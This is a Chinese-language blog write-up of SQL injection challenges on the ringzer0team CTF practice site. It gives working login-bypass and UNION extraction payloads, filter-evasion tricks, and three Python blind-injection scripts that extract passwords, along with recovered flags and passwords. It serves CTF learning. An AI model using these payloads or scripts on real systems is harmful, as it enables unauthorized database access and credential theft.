萌新福利—sql注入之旅 Secer's Blog - 记录互联网安全历程与个人成长经历

前记

最近发现了一个有趣的练习网站~里面有大量web题目，其中sql注入的题目也是由浅入深，适合萌新入门
给出网站地址

https://ringzer0team.com

Most basic SQLi pattern.(point 1)

签到题：

username: admin'#
password: 1

可以得到flag：FLAG-238974289383274893

ACL rulezzz the world.(point 2)

随手测试

username=admin'

得到

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 4

随手闭合一下

username=admin' or 1#

得到flag:FLAG-sdfoip340e89rfuj34woit

Login portal 1(point 2)

过滤了

#
--
=

其他没测试，直接随手pass

username=admin' or 'a' like 'a&password=1

即可拿到flag:FLAG-4f885o1dal0q1huj6eaxuatcvn

Random Login Form(point 2)

随手试了一下二次注入，发现有点不像
于是进行长度截断
注册

username=admin                                    1
password=1

username=admin
password=1

得到flag:FLAG-0Kg64o8M9gPQfH45583Mc0jc3u

Just another login form(point 2)

尝试了一下无果，于是尝试联合注入

username = admin' union select md5(1),md5(1),md5(1)#
password = 1

得到回显:Bad search filter
搜索发现是LDAP的特定错误
于是登录

username = *
password = *

得到flag:FLAG-38i65201RR4B5g1oAm05fHO0QP
这是一个值得研究的点，默默记下了~最近的sql注入很少见，记得以前XCTF联赛中出现过~

Po po po po postgresql(point 2)

随手试试

username=admin' or 'a' like 'a&password=1

回显

ERROR:  invalid input syntax for type boolean: "admin"
LINE 1: SELECT * FROM users WHERE (username = ('admin' or 'a' like '...

于是闭合

username=admin') or 'a' like 'a') -- &password=1

得到flag:FLAG-mdeq68jNN88xLB1o2m8V33Ld

Don't mess with Noemie; she hates admin!(point 3)

尝试

username = admin' or sleep(5) or 'a' like 'a

发现sleep成功
说明闭合有效
那么直接刚

username = admin' or 'a' like 'a

发现登录失败
那么猜想后台语句

$sql = select * from users where username='$username' and password = '$password'

所以我们尝试

username = 1' or 1 or '
password = 1

带入即

select * from users where username='1' or 1 or '' and password = '1'

即可成功绕过
得到flag:FLAG-Yk3Hfovvb5kALU9hI2545MaY

What's the definition of NULL(point 3)

看到url：?id=MQ==
明显是base64
解一下，发现是:id=1
随手测试

id = 1'#
id = MScj

得到

SQLite Database error please try again later.

然后自己测试了很久无果
回到起点，想起来他有描述

Hint WHERE (id IS NOT NULL) AND (ID = ? AND display = 1)

看来后台sql的确是这么写的

WHERE (id IS NOT NULL) AND (ID = base64_decode($_GET[id]) AND display = 1)

构造

0) OR (ID IS NULL) OR (1=2

带入得:

WHERE (id IS NOT NULL) AND (ID = 0) OR (ID IS NULL) OR (1=2 AND display = 1)

编码一下

?id=MCkgT1IgKElEIElTIE5VTEwpIE9SICgxPTI=

得到flag：FLAG-sQFYzqfxbZhAj04NyCCV8tqA
这个题也挺有意思的，值得研究一下~

Login portal 2(point 3)

上去就尝试

username = 1' or 1 or '
password = 1

毕竟老套路
回显

Wrong password for impossibletoguess.

发现impossibletoguess很可疑
可能是个用户名，竟然回显了，那试试union

username = 1' union select 1,2#
password = 1

回显

Wrong password for 1.

剩下的就是联合注入了

1' union select (select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),2#
Wrong password for users.
1' union select (select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='users'),2#
Wrong password for username,password.
1' union select (select username from users limit 0,1),2#
Wrong password for impossibletoguess.
1' union select (select password from users limit 0,1),2#
Wrong password for 1b2f190ad705d7c2afcac45447a31b053fada0c4.

长度40的密码，显然不是md5，猜测为sha1
联合注入

username = impossibletoguess' union select sha1(1),sha1(1)#
password = 1

登录成功，得到flag:FLAG-wlez73yxtkae9mpr8aerqay7or

Quote of the day(point 4)

随手测试id

?q=2'
No result found for id "2'"

发现可以回显，尝试Union，发现空格被过滤，用%0a绕过

?q=2%0aunion%0aselect%0a1,2#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: 2

然后老套路即可:

?q=2%0aunion%0aselect%0a1,(select%0agroup_concat(
TABLE_NAME)%0afrom%0ainformation_schema.TABLES%0awhere%0aTABLE_SCHEMA=database())#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: alkdjf4iu,quotes
?q=2%0aunion%0aselect%0a1,(select%0agroup_concat(COLUMN_NAME)%0afrom%0ainformation_schema.COLUMNS%0awhere%0aTABLE_NAME=0x616c6b646a66346975)#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: id,flag
?q=2%0aunion%0aselect%0a1,(select%0aflag%0afrom%0aalkdjf4iu%0alimit%0a0,1)#
Quote of the day: No one forgives with more grace and love than a child.
Quote of the day: FLAG-bB6294R6cmLUlAu6H71sTd2J

over~

Thinking outside the box is the key(point 4)

随手尝试

?id=2’

得到

SQLite Database error please try again later.

知道了是SQLite
继续测试

?id=2 and 1=2 union select 1,2 from sqlite_master
2
?id=2 and 1=2 union select 1,sqlite_version() from sqlite_master
3.8.7.1
?id=2 and 1=2 union select 1,((select name from sqlite_master where type='table' limit 0,1)) from sqlite_master
random_stuff

依次类推，得到所有表名

random_stuff
ajklshfajks
troll
aatroll

我选择ajklshfajks
根据之前的经验，应该是flag字段了

?id=2 and 1=2 union select 1,((select flag from ajklshfajks limit 0,1)) from sqlite_master
FLAG-13lIBUTHNFLEprz2KKMx6yqV

over~

No more hacking for me!(point 4)

好坑，f12源代码里有说明

<!-- l33t dev comment: -->
<!-- No more hacking attempt we implemented the MOST secure filter -->
<!-- urldecode(addslashes(str_replace("'", "", urldecode(htmlspecialchars($_GET['id'], ENT_QUOTES))))) -->

我说我为什么一直做不出来：(
发现这一点后就很容易了：

http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,tbl_name,3 FROM sqlite_master WHERE type=%252527table%252527  limit 0,1 -- 
http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,sql,3 FROM sqlite_master WHERE type=%252527table%252527  and tbl_name=%252527random_data%252527 limit 0,1 -- 

random_data  CREATE TABLE random_data (id int, message varchar(50), display int) 

http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,message,3 FROM random_data limit 2,1 --

即可得到flag

FLAG-ev72V7Q4a1DzYRw5fxT71GC815JE

Quote of the day reloaded(point 5)

感觉题目是不是有点脑洞？还是我没发现
尝试来尝试去，发现这样可以成功

?q=3\&s=ununionion select 1,2%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: 2

union要双写绕过

?q=3\&s=ununionion%20select%201,(select%20group_concat(TABLE_NAME)%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=database())%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: qdyk5,quotes
?q=3\&s=ununionion%20select%201,(select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x7164796b35)%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: id,flag
?q=3\&s=ununionion%20select%201,(select flag from qdyk5 limit 0,1)%23
Quote of the day: Famous remarks are very seldom quoted correctly.
Quote of the day: FLAG-enjlleb337u17K7yLqZ927F3

over~
(注：虽然做出来了，还是觉得摸不着头脑，感觉关联性不强啊，我也是随手试出来的= =)

Hot Single Mom(point 6)

看到描述

Get laid or get lazy it's up to you 
Find online hot single Mom

就知道不是什么正经题目，果然网站挂了(滑稽)
但是有说明题目来源:GoSecure CTF 2014
搜索了一下

https://gist.github.com/h3xstream/3bc4f264cc911e37f0d6

应该是道不错的注入题目
有flag：FLAG-wBGc5g147MuVQuC28L9Tw8H8HF

Login portal 3(point 6)

这题我用了盲注，但是目前为止这是第一道用盲注的题，所以不知道是不是做麻烦了~
脚本如下

import requests
import string
url = "https://ringzer0team.com/challenges/5"
cookie = {
    "PHPSESSID":"27vctgun5jjk5ou82oqv9clog2",
    "_ga":"GA1.2.1724649637.1519735081",
    "_gid":"GA1.2.933125333.1519735081"
}
flag = ""
for i in range(1,1000):
    print "i:",i
    for j in range(33,127):
    #for j in "0123456789"+string.letters+"-_!@#$^&*()={}":
        data = {
            #"username":"1' or (substr((database()),%s,1)='%s') and 'a'='a"%(i,j), login3
            #"username": "1' or (substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),%s,1)='%s') and 'a'='a" % (i, j), users
            #"username": "1' or (substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x7573657273),%s,1)='%s') and 'a'='a" % (i, j),username,password
            "username": "1' or (ascii(substr((select password from users limit 0,1),%s,1))=%s) and 'a'='a" % (i, j),
            "password":"1" #SQL1nj3ct10nFTW
        }

        r = requests.post(data=data,url=url,cookies=cookie)
        if "Invalid username / password" in r.content:
            flag += chr(j)
            print flag
            break

列名我没跑(滑稽脸)，毕竟知道了他的套路，猜测是password，一猜就中~~
最后得到密码

SQL1nj3ct10nFTW

登录拿到flag：FLAG-vgnvokjmi3fgx0s23iv5x8n2w2

When it's lite it's not necessarily easy(point 6)

随手测试

username = 1' or sleep(5) or 'a'='a
password = 1

发现报错

SQLite Database error please try again later. Impossible to fetch username & password from users table

这也省事了，直接把列名，表名都弄出来了
于是直接取password进行盲注即可

import requests
import string
url = "https://ringzer0team.com/challenges/19"
cookie = {
    "PHPSESSID":"27vctgun5jjk5ou82oqv9clog2",
    "_ga":"GA1.2.1724649637.1519735081",
    "_gid":"GA1.2.933125333.1519735081"
}
flag = ""
for i in range(1,1000):
    print "i:",i
    for j in "0123456789"+string.letters+"-_!@#$^&*()={}":
        data = {
            "username": "1' or (substr((select password from users limit 0,1),%s,1)='%s') and 'a'='a" % (i, j),
            "password":"1" #4dm1nzP455
        }

        r = requests.post(data=data,url=url,cookies=cookie)
        if "Invalid username / password" in r.content:
            flag += j
            print flag
            break

得到密码

4dm1nzP455

登录拿到flag:FLAG-rL4t5LRMwjacD82G9vpAd6Gm

Internet As A Service(point 7)

疯狂测试后得到payload:

/?s = 1'<0e0union select 1,2,3#

然后老套路即可

?s=1'<0e0union select 1,2,SCHEMA_NAME from information_schema.SCHEMATA limit 1,1#
iaas
?s=1'<0e0union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA like 0x69616173 limit 0,1#
iaas
rz_flag
?s=1'<0e0union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME like 0x727a5f666c6167 limit 0,1#
flag
?s=1'<0e0union select 1,2,flag from rz_flag limit 0,1#
FLAG-0f6Ie30uNz4Dy7o872e15lXLS2NKO1uj

over~~

Login portal 4(point 7)

这题用了时间盲注
脚本如下

import requests
url = "https://ringzer0team.com/challenges/6"
cookie = {
    "PHPSESSID":"vtqgjp8amva1fsr6eolee70af4",
    "_ga":"GA1.2.1724649637.1519735081",
    "_gid":"GA1.2.933125333.1519735081",
    "_gat":"1"
}
flag = ""
for i in range(1,1000):
    for j in range(33,127):
        print "i:", i,"j:",j
        data = {
            "username":"1' || if((ascii(substr((select password from users limit 0,1),%s,1))=%s),sleep(3),1) || '"%(i,j),
            "password":"1"
        }
        try:
            r = requests.post(url=url,data=data,cookies=cookie,timeout=2.5)
        except:
            flag += chr(j)
            print flag
            break

得到密码：

UrASQLi1337!

登录后拿到flag

FLAG-70ygerntbicjdzrxmm0rmk0xx2

后记

本人算是抛砖引玉啦~由于能力有限，只能给出大部分题目题解，还有一些有趣的题目待大家继续深挖啦~期待与各位大师傅的套路~Orz